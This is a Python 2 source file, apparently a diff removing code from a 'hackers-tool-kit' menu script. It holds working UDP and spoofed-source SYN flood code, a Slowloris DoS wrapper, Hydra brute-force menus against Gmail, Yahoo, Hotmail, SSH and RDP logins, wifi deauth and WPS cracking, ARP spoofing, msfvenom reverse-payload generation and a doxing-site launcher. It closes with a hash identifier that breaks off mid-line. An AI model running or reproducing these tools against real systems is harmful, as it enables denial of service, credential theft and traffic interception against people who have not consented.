os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False 